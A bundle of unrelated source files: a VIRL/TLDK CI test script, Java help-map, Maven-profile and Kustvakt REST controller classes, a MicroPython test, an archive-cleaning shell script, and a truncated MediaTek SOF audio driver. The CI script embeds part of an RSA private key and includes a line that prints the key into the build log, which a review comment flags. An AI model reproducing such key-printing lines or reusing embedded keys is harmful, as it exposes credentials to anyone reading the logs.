xVMND4XI6xb/apBWAZgZpIFrqrWoIBM3ptfsKipZe91ngBPUnL9s0Dolx452RVAj
yctHB8uRxWYgqDkjsxtzXf1HnZBBkBS8CUzYj+hdfuddoeKLaY3invXLCiV+PpXS
U4KAK9kCgYEAtSv0m5+Fg74BbAiFB6kCh11FYkW94YI6B/E2D/uVTD5dJhyEUFgZ
cWsudXjMki8734WSpMBqBp/J8wG3C9ZS6IpQD+U7UXA+roB7Qr+j4TqtWfM+87Rh
maOpG56uAyR0w5Z9BhwzA3VakibVk9KwDgZ29WtKFzuATLFnOtCS46E=
-----END RSA PRIVATE KEY-----
EOF
# ssh refuses world-readable identity files; restrict to the owner.
chmod 600 ${VIRL_PKEY}
#
# Pick a random host from the array of VIRL servers, and attempt
# to reach it and verify its status.
#
# The server must be reachable, and have a "status" file with
# the content "PRODUCTION", to be selected.
#
# If the server is not reachable, or does not have the correct
# status, remove it from the array and start again.
#
# Abort if there are no more servers left in the array.
#
while [[ ! "$VIRL_SERVER" ]]
do
    num_hosts=${#VIRL_SERVERS[@]}
    # Use an arithmetic test on a quoted count (the original string
    # comparison with == happened to work but is fragile).
    if [ "${num_hosts}" -eq 0 ]
    then
        echo "No more VIRL candidate hosts available, failing."
        exit 127
    fi
    # $(( )) replaces the deprecated $[ ] arithmetic syntax.
    element=$(( RANDOM % num_hosts ))
    virl_server_candidate=${VIRL_SERVERS[$element]}
    virl_server_status=$(ssh ${SSH_OPTIONS} ${VIRL_USERNAME}@${virl_server_candidate} cat $VIRL_SERVER_STATUS_FILE 2>&1)
    echo VIRL HOST $virl_server_candidate status is \"$virl_server_status\"
    if [ "$virl_server_status" == "$VIRL_SERVER_EXPECTED_STATUS" ]
    then
        # Candidate is in good status. Select this server.
        VIRL_SERVER="$virl_server_candidate"
    else
        # Candidate is in bad status. Remove from array.
        VIRL_SERVERS=("${VIRL_SERVERS[@]:0:$element}" "${VIRL_SERVERS[@]:$(( element + 1 ))}")
    fi
done
# We will pack all the TLDK dependency files and copy them to the VIRL_SERVER.
VIRL_DIR_LOC="/tmp"
TLDK_TAR_FILE="tldk_depends.tar.gz"
wget "fast.dpdk.org/rel/${DPDK_PACKAGE}"
tar zcf ${TLDK_TAR_FILE} ${DPDK_PACKAGE} ./tldk/ \
    ./tests/tldk/tldk_testconfig/
# SECURITY NOTE(review): this prints the private key into the CI log.
# Presumably a leftover debugging aid — should be removed; confirm first.
cat ${VIRL_PKEY}
# Copy the files to VIRL host
scp ${SSH_OPTIONS} ${TLDK_TAR_FILE} \
    ${VIRL_USERNAME}@${VIRL_SERVER}:${VIRL_DIR_LOC}/
result=$?
if [ "${result}" -ne "0" ]; then
    echo "Failed to copy tldk package file to virl host"
    echo ${result}
    exit ${result}
fi
# Start a simulation on VIRL server
echo "Starting simulation on VIRL server"
VIRL_TOPOLOGY=double-ring-nested.xenial
VIRL_RELEASE=csit-ubuntu-16.04.1_2017-07-26_1.9
# Tears down the remote simulation identified by VIRL_SID.
function stop_virl_simulation {
    ssh ${SSH_OPTIONS} ${VIRL_USERNAME}@${VIRL_SERVER}\
        "stop-testcase ${VIRL_SID}"
}
# Upon script exit, cleanup the simulation execution
trap stop_virl_simulation EXIT
# use the start-testcase-TLDK for the TLDK test case;
# stdout of the remote command is the session ID on success.
VIRL_SID=$(ssh ${SSH_OPTIONS} \
    ${VIRL_USERNAME}@${VIRL_SERVER} \
    "start-testcase-TLDK -c ${VIRL_TOPOLOGY} -r ${VIRL_RELEASE} ${VIRL_DIR_LOC}/${TLDK_TAR_FILE}")
retval=$?
if [ "${retval}" -ne "0" ]; then
    echo "VIRL simulation start failed"
    exit ${retval}
fi
# Sanity-check the returned ID: "session-" followed by six word chars.
if [[ ! "${VIRL_SID}" =~ session-[a-zA-Z0-9_]{6} ]]; then
    echo "No VIRL session ID reported."
    exit 127
fi
echo ${VIRL_SID}
ssh_do ${VIRL_USERNAME}@${VIRL_SERVER} cat /scratch/${VIRL_SID}/topology.yaml
# Download the topology file from virl session
scp ${SSH_OPTIONS} \
    ${VIRL_USERNAME}@${VIRL_SERVER}:/scratch/${VIRL_SID}/topology.yaml \
    topologies/enabled/topology.yaml
retval=$?
if [ "${retval}" -ne "0" ]; then
    echo "Failed to copy topology file from VIRL simulation"
    exit ${retval}
fi
# create a python virtual environment env
virtualenv --system-site-packages env
. env/bin/activate
echo pip install
pip install -r ${SCRIPT_DIR}/requirements.txt
# Validate the downloaded topology against the expected schemas.
pykwalify -s ${SCRIPT_DIR}/resources/topology_schemas/3_node_topology.sch.yaml \
    -s ${SCRIPT_DIR}/resources/topology_schemas/topology.sch.yaml \
    -d ${SCRIPT_DIR}/topologies/enabled/topology.yaml \
    -vvv
# Schema failure is deliberately non-fatal: log it but run the tests anyway.
if [ "$?" -ne "0" ]; then
    echo "Topology schema validation failed."
    echo "However, the tests will start."
fi
# Run the Robot Framework TLDK functional suite against the simulation.
PYTHONPATH=`pwd` pybot -L TRACE -W 150 \
    -v TOPOLOGY_PATH:${SCRIPT_DIR}/topologies/enabled/topology.yaml \
    --suite "tests.tldk.func" \
    --include vm_envAND3_node_single_link_topo \
    --noncritical EXPECTED_FAILING \
    tests/
RETURN_STATUS=$(echo $?)
# Archive artifacts
mkdir archive
for i in ${ARCHIVE_ARTIFACTS[@]}; do
    cp $( readlink -f ${i} | tr '\n' ' ' ) archive/
done
# Propagate pybot's exit status as the job result.
exit ${RETURN_STATUS}
|
package io.opensphere.core.help.data;
import java.io.StringWriter;
import java.util.ArrayList;
import java.util.List;
import javax.xml.bind.JAXBContext;
import javax.xml.bind.JAXBException;
import javax.xml.bind.Marshaller;
import javax.xml.bind.annotation.XmlAccessType;
import javax.xml.bind.annotation.XmlAccessorType;
import javax.xml.bind.annotation.XmlElement;
import javax.xml.bind.annotation.XmlRootElement;
import org.apache.log4j.Logger;
import io.opensphere.core.util.JAXBContextHelper;
/**
 * This will be the top level of the help mapping contents. It marshals to
 * a JavaHelp-style &lt;map&gt; element whose children are the mapID entries.
 */
@XmlRootElement(name = "map")
@XmlAccessorType(XmlAccessType.NONE)
public class HelpMap
{
    /** Logger reference. */
    private static final Logger LOGGER = Logger.getLogger(HelpMap.class);

    /** The list of mapping entries. */
    @XmlElement(name = "mapID")
    private final List<HelpMapEntry> myMappingEntries;

    /**
     * Default constructor.
     */
    public HelpMap()
    {
        myMappingEntries = new ArrayList<>();
    }

    /**
     * Add mapping entries from another top level list to my list of mappings.
     *
     * @param mapList The other mappings list to copy to my own.
     * @return True if every entry was added successfully, false otherwise
     *         (also false when mapList is null or empty).
     */
    public boolean add(HelpMap mapList)
    {
        if (mapList == null || mapList.getMapEntries().isEmpty())
        {
            return false;
        }
        boolean result = true;
        for (HelpMapEntry entry : mapList.getMapEntries())
        {
            result &= myMappingEntries.add(entry);
        }
        return result;
    }

    /**
     * Add a mapping entry to my list of entries.
     *
     * @param entry The mapping entry to add.
     * @return True if successful, false otherwise.
     */
    public boolean add(HelpMapEntry entry)
    {
        return myMappingEntries.add(entry);
    }

    /**
     * Accessor for the list of mapping entries.
     *
     * @return The list of mapping entries.
     */
    public List<HelpMapEntry> getMapEntries()
    {
        return myMappingEntries;
    }

    /**
     * Remove the mapping entry at the specified index.
     *
     * @param index The index to remove.
     * @return The entry that was removed from the list.
     */
    public HelpMapEntry remove(int index)
    {
        return myMappingEntries.remove(index);
    }

    /**
     * Remove the given mapping entry from my mappings list.
     *
     * @param entry The mapping entry to remove
     * @return True if successful, false otherwise.
     */
    public boolean remove(Object entry)
    {
        return myMappingEntries.remove(entry);
    }

    /**
     * Convenience method to put the XML of this class into a string.
     * Marshalling errors are logged and an empty string is returned.
     *
     * @return String representation of the XML of this class.
     */
    public String toXml()
    {
        JAXBContext c = null;
        Marshaller m = null;
        StringWriter sw = new StringWriter();
        try
        {
            c = JAXBContextHelper.getCachedContext(HelpMap.class);
            m = c.createMarshaller();
            m.setProperty(Marshaller.JAXB_FORMATTED_OUTPUT, Boolean.TRUE);
            m.marshal(this, sw);
        }
        catch (JAXBException e)
        {
            LOGGER.error("Unable to create help mapping XML string: " + e.getMessage());
        }
        return sw.toString();
    }
}
|
# test uPy ujson behaviour that's not valid in CPy
try:
    import ujson
except ImportError:
    # Not running under MicroPython; signal the test harness to skip.
    print("SKIP")
    raise SystemExit

# CPython's json rejects bytes input; MicroPython's ujson serialises it.
print(ujson.dumps(b'1234'))
|
package de.ids_mannheim.korap.web.controller;
import java.util.List;
import javax.ws.rs.Consumes;
import javax.ws.rs.DELETE;
import javax.ws.rs.GET;
import javax.ws.rs.POST;
import javax.ws.rs.PUT;
import javax.ws.rs.Path;
import javax.ws.rs.PathParam;
import javax.ws.rs.Produces;
import javax.ws.rs.QueryParam;
import javax.ws.rs.core.Context;
import javax.ws.rs.core.MediaType;
import javax.ws.rs.core.Response;
import javax.ws.rs.core.Response.Status;
import javax.ws.rs.core.SecurityContext;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Controller;
import com.fasterxml.jackson.databind.JsonNode;
import com.sun.jersey.spi.container.ResourceFilters;
import de.ids_mannheim.korap.constant.OAuth2Scope;
import de.ids_mannheim.korap.constant.QueryType;
import de.ids_mannheim.korap.constant.ResourceType;
import de.ids_mannheim.korap.dto.QueryAccessDto;
import de.ids_mannheim.korap.dto.QueryDto;
import de.ids_mannheim.korap.exceptions.KustvaktException;
import de.ids_mannheim.korap.oauth2.service.OAuth2ScopeService;
import de.ids_mannheim.korap.security.context.TokenContext;
import de.ids_mannheim.korap.service.QueryService;
import de.ids_mannheim.korap.utils.ParameterChecker;
import de.ids_mannheim.korap.web.KustvaktResponseHandler;
import de.ids_mannheim.korap.web.filter.APIVersionFilter;
import de.ids_mannheim.korap.web.filter.AuthenticationFilter;
import de.ids_mannheim.korap.web.filter.BlockingFilter;
import de.ids_mannheim.korap.web.filter.DemoUserFilter;
import de.ids_mannheim.korap.web.filter.PiwikFilter;
import de.ids_mannheim.korap.web.input.QueryJson;
/**
 * VirtualCorpusController defines web APIs related to virtual corpus
 * (VC) such as creating, deleting and listing user virtual corpora.
 * All the APIs in this class are available to logged-in users, except
 * retrieving info of system VC.
 *
 * This class also includes APIs related to virtual corpus access
 * (VCA) such as sharing and publishing VC. When a VC is published,
 * it is shared with all users, but not always listed like system
 * VC. It is listed for a user once he/she has searched for the
 * VC. A VC can be published by creating or editing the VC.
 *
 * VC name must follow the following regex [a-zA-Z_0-9-.], other
 * characters are not allowed.
 *
 * @author margaretha
 *
 */
@Controller
@Path("{version}/vc")
@ResourceFilters({ APIVersionFilter.class, AuthenticationFilter.class,
        BlockingFilter.class, PiwikFilter.class })
public class VirtualCorpusController {

    @Autowired
    private KustvaktResponseHandler kustvaktResponseHandler;
    @Autowired
    private QueryService service;
    @Autowired
    private OAuth2ScopeService scopeService;

    /**
     * Creates a new VC with the given VC creator and VC name
     * specified as the path parameters. If a VC with the same name
     * and creator exists, the VC will be updated instead.
     *
     * VC name cannot be updated.
     *
     * The VC creator must be the same as the authenticated username,
     * except for admins. Admins can create or update system VC as
     * well as VC for any users.
     *
     *
     * @param securityContext
     * @param vcCreator
     *            the username of the vc creator, must be the same
     *            as the authenticated username, except admins
     * @param vcName
     *            the vc name
     * @param vc
     *            a json object describing the VC
     * @return HTTP Status 201 Created when creating a new VC, or 204
     *         No Content when updating an existing VC.
     * @throws KustvaktException
     */
    @PUT
    @Path("/~{vcCreator}/{vcName}")
    @Consumes(MediaType.APPLICATION_JSON + ";charset=utf-8")
    public Response createUpdateVC (@Context SecurityContext securityContext,
            @PathParam("vcCreator") String vcCreator,
            @PathParam("vcName") String vcName,
            QueryJson vc) throws KustvaktException {
        TokenContext context =
                (TokenContext) securityContext.getUserPrincipal();
        try {
            scopeService.verifyScope(context, OAuth2Scope.EDIT_VC);
            ParameterChecker.checkObjectValue(vc, "request entity");
            // Requests without an explicit query type default to a VC.
            if (vc.getQueryType() == null) {
                vc.setQueryType(QueryType.VIRTUAL_CORPUS);
            }
            Status status = service.handlePutRequest(context.getUsername(),
                    vcCreator, vcName, vc);
            return Response.status(status).build();
        }
        catch (KustvaktException e) {
            throw kustvaktResponseHandler.throwit(e);
        }
    }

    /**
     * Returns the virtual corpus with the given name and creator.
     * This web-service is also available for guests.
     *
     * @param securityContext
     * @param createdBy
     *            vc creator
     * @param vcName
     *            vc name
     * @return the virtual corpus with the given name and creator.
     */
    @GET
    @Path("~{createdBy}/{vcName}")
    @Produces(MediaType.APPLICATION_JSON + ";charset=utf-8")
    @ResourceFilters({ APIVersionFilter.class, AuthenticationFilter.class,
            DemoUserFilter.class, PiwikFilter.class })
    public QueryDto retrieveVCByName (
            @Context SecurityContext securityContext,
            @PathParam("createdBy") String createdBy,
            @PathParam("vcName") String vcName) {
        TokenContext context =
                (TokenContext) securityContext.getUserPrincipal();
        try {
            scopeService.verifyScope(context, OAuth2Scope.VC_INFO);
            return service.retrieveQueryByName(context.getUsername(), vcName,
                    createdBy, QueryType.VIRTUAL_CORPUS);
        }
        catch (KustvaktException e) {
            throw kustvaktResponseHandler.throwit(e);
        }
    }

    /**
     * Returns the KoralQuery (JSON) serialization of the named VC.
     */
    @GET
    @Path("/koralQuery/~{createdBy}/{vcName}")
    @Produces(MediaType.APPLICATION_JSON + ";charset=utf-8")
    public JsonNode retrieveVCKoralQuery (
            @Context SecurityContext securityContext,
            @PathParam("createdBy") String createdBy,
            @PathParam("vcName") String vcName) {
        TokenContext context =
                (TokenContext) securityContext.getUserPrincipal();
        try {
            scopeService.verifyScope(context, OAuth2Scope.VC_INFO);
            return service.retrieveKoralQuery(context.getUsername(), vcName,
                    createdBy, QueryType.VIRTUAL_CORPUS);
        }
        catch (KustvaktException e) {
            throw kustvaktResponseHandler.throwit(e);
        }
    }

    /**
     * Lists all virtual corpora available to the authenticated user.
     *
     * System-admins can list available vc for a specific user by
     * specifying the username parameter.
     *
     * Normal users cannot list virtual corpora
     * available for other users. Thus, the username parameter is optional
     * and must be identical to the authenticated username.
     *
     * @param securityContext
     * @param username
     *            a username (optional)
     * @return a list of virtual corpora
     */
    @GET
    @Produces(MediaType.APPLICATION_JSON + ";charset=utf-8")
    public List<QueryDto> listAvailableVC (
            @Context SecurityContext securityContext,
            @QueryParam("username") String username) {
        TokenContext context =
                (TokenContext) securityContext.getUserPrincipal();
        try {
            scopeService.verifyScope(context, OAuth2Scope.VC_INFO);
            return service.listAvailableQueryForUser(context.getUsername(),
                    username, QueryType.VIRTUAL_CORPUS);
        }
        catch (KustvaktException e) {
            throw kustvaktResponseHandler.throwit(e);
        }
    }

    /**
     * Lists all system virtual corpora, if the path parameter
     * <em>createdBy</em> is set to "system" or "SYSTEM".
     * Otherwise, lists all virtual corpora created by the given user.
     *
     * This web-service is only available to the owner of the vc.
     * Users, except system-admins, are not allowed to list vc created
     * by other users.
     *
     * Besides "system"/"SYSTEM", the path parameter "createdBy" must
     * be the same as the authenticated username.
     *
     * @param createdBy
     *            system or username
     * @param securityContext
     * @return all system VC, if createdBy=system, otherwise a list of
     *         virtual corpora created by the authorized user.
     */
    @GET
    @Path("~{createdBy}")
    @Produces(MediaType.APPLICATION_JSON + ";charset=utf-8")
    public List<QueryDto> listUserOrSystemVC (
            @PathParam("createdBy") String createdBy,
            @Context SecurityContext securityContext) {
        TokenContext context =
                (TokenContext) securityContext.getUserPrincipal();
        try {
            scopeService.verifyScope(context, OAuth2Scope.VC_INFO);
            if (createdBy.toLowerCase().equals("system")) {
                return service.listSystemQuery(QueryType.VIRTUAL_CORPUS);
            }
            else {
                return service.listOwnerQuery(context.getUsername(), createdBy,
                        QueryType.VIRTUAL_CORPUS);
            }
        }
        catch (KustvaktException e) {
            throw kustvaktResponseHandler.throwit(e);
        }
    }

    /**
     * Lists virtual corpora by creator and type. This is a controller
     * for system admin requiring valid system admin authentication.
     *
     * If type is not specified, retrieves virtual corpora of all
     * types. If createdBy is not specified, retrieves virtual corpora
     * of all users.
     *
     * @param securityContext
     * @param createdBy
     *            username of virtual corpus creator (optional)
     * @param type
     *            {@link ResourceType}
     * @return a list of virtual corpora
     */
    @GET
    @Path("list/system-admin")
    @Produces(MediaType.APPLICATION_JSON + ";charset=utf-8")
    public List<QueryDto> listVCByType (
            @Context SecurityContext securityContext,
            @QueryParam("createdBy") String createdBy,
            @QueryParam("type") ResourceType type) {
        TokenContext context =
                (TokenContext) securityContext.getUserPrincipal();
        try {
            scopeService.verifyScope(context, OAuth2Scope.ADMIN);
            return service.listQueryByType(context.getUsername(), createdBy, type,
                    QueryType.VIRTUAL_CORPUS);
        }
        catch (KustvaktException e) {
            throw kustvaktResponseHandler.throwit(e);
        }
    }

    /**
     * Only the VC owner and system admins can delete VC. VCA admins
     * can delete VC-accesses e.g. of project VC, but not the VC
     * themselves.
     *
     * @param securityContext
     * @param createdBy
     *            vc creator
     * @param vcName
     *            vc name
     * @return HTTP status 200, if successful
     */
    @DELETE
    @Path("~{createdBy}/{vcName}")
    public Response deleteVCByName (@Context SecurityContext securityContext,
            @PathParam("createdBy") String createdBy,
            @PathParam("vcName") String vcName) {
        TokenContext context =
                (TokenContext) securityContext.getUserPrincipal();
        try {
            scopeService.verifyScope(context, OAuth2Scope.DELETE_VC);
            service.deleteQueryByName(context.getUsername(), vcName, createdBy,
                    QueryType.VIRTUAL_CORPUS);
        }
        catch (KustvaktException e) {
            throw kustvaktResponseHandler.throwit(e);
        }
        return Response.ok().build();
    }

    /**
     * VC can only be shared with a group, not individuals.
     * Only VCA admins are allowed to share VC and the VC must have
     * been created by themselves.
     *
     * <br /><br />
     * Not allowed via third-party apps.
     *
     * @param securityContext
     * @param vcCreator
     *            the username of the vc creator
     * @param vcName
     *            the name of the vc
     * @param groupName
     *            the name of the group to share
     * @return HTTP status 200, if successful
     */
    @POST
    @Path("~{vcCreator}/{vcName}/share/@{groupName}")
    public Response shareVC (@Context SecurityContext securityContext,
            @PathParam("vcCreator") String vcCreator,
            @PathParam("vcName") String vcName,
            @PathParam("groupName") String groupName) {
        TokenContext context =
                (TokenContext) securityContext.getUserPrincipal();
        try {
            scopeService.verifyScope(context, OAuth2Scope.SHARE_VC);
            service.shareQuery(context.getUsername(), vcCreator, vcName, groupName);
        }
        catch (KustvaktException e) {
            throw kustvaktResponseHandler.throwit(e);
        }
        return Response.ok("SUCCESS").build();
    }

    /**
     * Only VCA Admins and system admins are allowed to delete a
     * VC-access.
     *
     * <br /><br />
     * Not allowed via third-party apps.
     *
     * @param securityContext
     * @param accessId
     *            the id of the VC-access to delete
     * @return HTTP status 200, if successful
     */
    @DELETE
    @Path("access/{accessId}")
    public Response deleteVCAccessById (
            @Context SecurityContext securityContext,
            @PathParam("accessId") int accessId) {
        TokenContext context =
                (TokenContext) securityContext.getUserPrincipal();
        try {
            scopeService.verifyScope(context, OAuth2Scope.DELETE_VC_ACCESS);
            service.deleteQueryAccess(accessId, context.getUsername());
        }
        catch (KustvaktException e) {
            throw kustvaktResponseHandler.throwit(e);
        }
        return Response.ok().build();
    }

    /**
     * Lists active VC-accesses available to user.
     *
     * Only available to VCA and system admins.
     * For system admins, lists all VCA regardless of status.
     *
     * @param securityContext
     * @param groupName
     *            restrict the listing to one group (optional)
     * @return a list of VC accesses
     */
    @GET
    @Path("access")
    @Produces(MediaType.APPLICATION_JSON + ";charset=utf-8")
    public List<QueryAccessDto> listVCAccesses (
            @Context SecurityContext securityContext,
            @QueryParam("groupName") String groupName) {
        TokenContext context =
                (TokenContext) securityContext.getUserPrincipal();
        try {
            scopeService.verifyScope(context, OAuth2Scope.VC_ACCESS_INFO);
            if (groupName!=null && !groupName.isEmpty()){
                return service.listQueryAccessByGroup(context.getUsername(), groupName);
            }
            else {
                return service.listQueryAccessByUsername(context.getUsername());
            }
        }
        catch (KustvaktException e) {
            throw kustvaktResponseHandler.throwit(e);
        }
    }
}
|
#!/bin/sh
# Strip every file_* containing the marker "DELETE ME" out of a .tgz
# archive and write the result as cleaned_<name>.tgz next to the caller.
fileName=$1

# Create a temporary directory that stores the library files.
SCRATCH=$(mktemp -dp /tmp)
# Fixed: the scratch directory was never removed, leaking one /tmp
# directory per run. Clean it up on any exit path.
trap 'rm -rf "$SCRATCH"' EXIT

tar -xzf "$fileName" -C "$SCRATCH"
# Stores the current directory
here=$(pwd)
cd "$SCRATCH" || exit
# The archive is expected to contain a single top-level directory.
name=$(ls)
cd "$name" || exit
# Search the current directory for files containing
# "DELETE ME" and remove each file found.
grep -lF "DELETE ME" file_* | xargs rm
cd .. || exit
# Creates the cleaned archive using $here to
# go to the proper path.
tar -czf "$here"/cleaned_"$name".tgz "$name"
|
package com.agido.idea.settings.plugins.maven;
import com.google.common.base.Joiner;
import com.google.common.base.Splitter;
import com.google.common.collect.Sets;
import com.intellij.openapi.util.Pair;
import org.jetbrains.annotations.NotNull;
import java.util.Set;
import java.util.TreeSet;
/**
 * Immutable pair of Maven profile name sets: enabled profiles (first)
 * and disabled profiles (second). Serialises to the comma-separated
 * "enabled,-disabled" syntax, e.g. "prod,-dev,-ci".
 */
public class MavenProfiles extends Pair.NonNull<TreeSet<String>, TreeSet<String>> {

    private MavenProfiles(@NotNull TreeSet<String> first, @NotNull TreeSet<String> second) {
        super(first, second);
    }

    public Set<String> getEnabledProfiles() {
        return first;
    }

    public Set<String> getDisabledProfiles() {
        return second;
    }

    @Override
    public String toString() {
        final String enabled = Joiner.on(',').join(getEnabledProfiles());
        final String disabled = Joiner.on(",-").join(getDisabledProfiles());
        final boolean noEnabled = enabled.isEmpty();
        final boolean noDisabled = disabled.isEmpty();
        if (noEnabled && noDisabled) {
            return "";
        }
        if (noEnabled) {
            return "-" + disabled;
        }
        if (noDisabled) {
            return enabled;
        }
        // The ",-" separator supplies the '-' prefix of the first
        // disabled profile; the rest already carry it from the join above.
        return Joiner.on(",-").join(enabled, disabled);
    }

    /**
     * Parses a comma-separated profile list. Names prefixed with '-' are
     * collected as disabled, all others as enabled; blank entries are skipped.
     */
    public static MavenProfiles of(String profiles) {
        final TreeSet<String> enabled = Sets.newTreeSet();
        final TreeSet<String> disabled = Sets.newTreeSet();
        for (final String raw : Sets.newTreeSet(Splitter.on(",").split(profiles))) {
            final String profile = raw.trim();
            if (profile.isEmpty()) {
                continue;
            }
            if (profile.startsWith("-")) {
                disabled.add(profile.substring(1));
            } else {
                enabled.add(profile);
            }
        }
        return of(enabled, disabled);
    }

    public static MavenProfiles of(TreeSet<String> enabled, TreeSet<String> disabled) {
        return new MavenProfiles(enabled, disabled);
    }
}
|
<filename>src/drivers/mediatek/mt8195/afe-memif.c
// SPDX-License-Identifier: BSD-3-Clause
//
// Copyright(c) 2021 Mediatek
//
// Author: <NAME> <<EMAIL>>
// <NAME> <<EMAIL>>
#include <sof/common.h>
#include <sof/audio/component.h>
#include <sof/drivers/afe-drv.h>
#include <sof/drivers/afe-dai.h>
#include <sof/drivers/afe-memif.h>
#include <sof/drivers/timer.h>
#include <sof/lib/alloc.h>
#include <sof/lib/dma.h>
#include <sof/lib/io.h>
#include <sof/lib/notifier.h>
#include <sof/lib/uuid.h>
#include <sof/math/numbers.h>
#include <sof/platform.h>
#include <errno.h>
#include <stddef.h>
#include <stdint.h>
/* df5e94d7-fd93-42e9-bb94-ab40becc7151 */
DECLARE_SOF_UUID("memif", memif_uuid, 0xdf5e94d7, 0xfd93, 0x42e9,
0xbb, 0x94, 0xab, 0x40, 0xbe, 0xcc, 0x71, 0x51);
DECLARE_TR_CTX(memif_tr, SOF_UUID(memif_uuid), LOG_LEVEL_INFO);
/*
* Note: TEST_SGEN for test only
* Define this TEST_SGEN to enable sine tone generator
* then output data to audio memory interface(memif),
* you can set TEST_SGEN_ID to choose output to which memif.
* e.g. set TEST_SGEN as '1' and TEST_SGEN_ID as "MT8195_MEMIF_DL2",
* the data source of DL2 will from sine generator.
*/
#define TEST_SGEN (0)
#if TEST_SGEN
#include <mt8195-afe-regs.h>
#include <mt8195-afe-common.h>
/* Which memif the generated sine tone is routed to. */
#define TEST_SGEN_ID MT8195_MEMIF_DL2
/* Register field layout for the sine-generator control registers. */
#define AUDIO_TML_PD_MASK 1
#define AUDIO_TML_PD_SHIFT 27
#define AFE_SGEN_FREQ_DIV_CH1_MASK 0x1f
#define AFE_SGEN_FREQ_DIV_CH1_SHIFT 0
#define AFE_SGEN_FREQ_DIV_CH2_MASK 0x1f
#define AFE_SGEN_FREQ_DIV_CH2_SHIFT 12
#define AFE_SGEN_AMP_DIV_CH1_MASK 0x7
#define AFE_SGEN_AMP_DIV_CH1_SHIFT 5
#define AFE_SGEN_AMP_DIV_CH2_MASK 0x7
#define AFE_SGEN_AMP_DIV_CH2_SHIFT 17
#define AFE_SGEN_MUTE_CH1_MASK 0x1
#define AFE_SGEN_MUTE_CH1_SHIFT 24
#define AFE_SGEN_MUTE_CH2_MASK 0x1
#define AFE_SGEN_MUTE_CH2_SHIFT 25
#define AFE_SGEN_ENABLE_MASK 0x1
#define AFE_SGEN_ENABLE_SHIFT 26
#define AFE_SINEGEN_CON1_TIMING_CH1_MASK 0x1f
#define AFE_SINEGEN_CON1_TIMING_CH1_SHIFT 16
#define AFE_SINEGEN_CON1_TIMING_CH2_MASK 0x1f
#define AFE_SINEGEN_CON1_TIMING_CH2_SHIFT 21
#define AFE_SINEGEN_LB_MODE_MSK 0xff
#define AFE_SINEGEN_LB_MODE_SHIFT 24
/* Loopback-mode codes that route the sine generator to a given memif. */
enum {
	MT8195_SGEN_UL5 = 0x18,
	MT8195_SGEN_UL4 = 0x1f,
	MT8195_SGEN_DL3 = 0x47,
	MT8195_SGEN_DL2 = 0x60,
};
/*sgen freq div*/
enum {
	SGEN_FREQ_64D1 = 1,
	SGEN_FREQ_64D2 = 2,
	SGEN_FREQ_64D3 = 3,
	SGEN_FREQ_64D4 = 4,
	SGEN_FREQ_64D5 = 5,
	SGEN_FREQ_64D6 = 6,
	SGEN_FREQ_64D7 = 7,
	SGEN_FREQ_64D8 = 8,
};
/*sgen amp div*/
enum {
	SGEN_AMP_D1 = 0,
	SGEN_AMP_D2 = 1,
	SGEN_AMP_D4 = 2,
	SGEN_AMP_D8 = 3,
	SGEN_AMP_D16 = 4,
	SGEN_AMP_D32 = 5,
	SGEN_AMP_D64 = 6,
	SGEN_AMP_D128 = 7,
};
/* Timing codes selecting the sine generator's sample rate. */
enum {
	SGEN_CH_TIMING_8K = 0,
	SGEN_CH_TIMING_12K = 1,
	SGEN_CH_TIMING_16K = 2,
	SGEN_CH_TIMING_24K = 3,
	SGEN_CH_TIMING_32K = 4,
	SGEN_CH_TIMING_48K = 5,
	SGEN_CH_TIMING_96K = 6,
	SGEN_CH_TIMING_192K = 7,
	SGEN_CH_TIMING_384K = 8,
	SGEN_CH_TIMING_7P35K = 16,
	SGEN_CH_TIMING_11P025K = 17,
	SGEN_CH_TIMING_14P7K = 18,
	SGEN_CH_TIMING_22P05K = 19,
	SGEN_CH_TIMING_29P4K = 20,
	SGEN_CH_TIMING_44P1K = 21,
	SGEN_CH_TIMING_88P2K = 22,
	SGEN_CH_TIMING_176P4K = 23,
	SGEN_CH_TIMING_352P8K = 24,
};
#endif
/* Per-channel private state binding one SOF DMA channel to one AFE memif. */
struct afe_memif_dma {
	int direction; /* 1 downlink, 0 uplink */
	int memif_id;  /* index of the AFE memory interface */
	int dai_id;    /* DAI this memif is wired to (set in set_config) */
	int irq_id;    /* AFE IRQ used for period notifications */
	struct mtk_base_afe *afe;
	uint32_t dma_base;    /* buffer base address programmed into the memif */
	uint32_t dma_size;    /* total ring buffer size in bytes */
	uint32_t rptr;        /* read offset within the ring (bytes) */
	uint32_t wptr;        /* write offset within the ring (bytes) */
	uint32_t period_size; /* bytes per period (first elem size) */
	unsigned int channel; /* audio channel count, from the DAI config */
	unsigned int rate;    /* sample rate, from the DAI config */
	unsigned int format;  /* sample format, from the DAI config */
};
/*
 * Acquire the specific DMA channel requested by @req_chan.
 * Returns the claimed channel, or NULL if the index is out of range or the
 * channel is already in use. The busy count and status are updated under
 * the controller lock.
 */
static struct dma_chan_data *memif_channel_get(struct dma *dma, unsigned int req_chan)
{
	uint32_t flags;
	struct dma_chan_data *channel;

	tr_dbg(&memif_tr, "MEMIF: channel_get(%d)", req_chan);

	spin_lock_irq(&dma->lock, flags);
	/* Reject indices beyond the platform-declared channel count. */
	if (req_chan >= dma->plat_data.channels) {
		spin_unlock_irq(&dma->lock, flags);
		tr_err(&memif_tr, "MEMIF: Channel %d out of range", req_chan);
		return NULL;
	}

	channel = &dma->chan[req_chan];
	/* Only channels still in INIT state are free to hand out. */
	if (channel->status != COMP_STATE_INIT) {
		spin_unlock_irq(&dma->lock, flags);
		tr_err(&memif_tr, "MEMIF: Cannot reuse channel %d", req_chan);
		return NULL;
	}

	/* Claim the channel while still holding the lock. */
	atomic_add(&dma->num_channels_busy, 1);
	channel->status = COMP_STATE_READY;

	spin_unlock_irq(&dma->lock, flags);

	return channel;
}
/*
 * Release a previously acquired channel back to the free pool.
 * The channel must not be running when this is called.
 */
static void memif_channel_put(struct dma_chan_data *channel)
{
	uint32_t flags;

	/* Assuming channel is stopped, we thus don't need hardware to
	 * do anything right now
	 */
	tr_info(&memif_tr, "MEMIF: channel_put(%d)", channel->index);

	/* Drop any copy/notification subscribers attached to this channel. */
	notifier_unregister_all(NULL, channel);

	spin_lock_irq(&channel->dma->lock, flags);
	channel->status = COMP_STATE_INIT;
	atomic_sub(&channel->dma->num_channels_busy, 1);
	spin_unlock_irq(&channel->dma->lock, flags);
}
#if TEST_SGEN
/*
 * Map a sample rate in Hz to the sine generator's timing code.
 * Unknown rates log an error and fall back to the 48 kHz code.
 */
static uint32_t mt8195_sinegen_timing(uint32_t rate)
{
	static const struct {
		uint32_t rate;
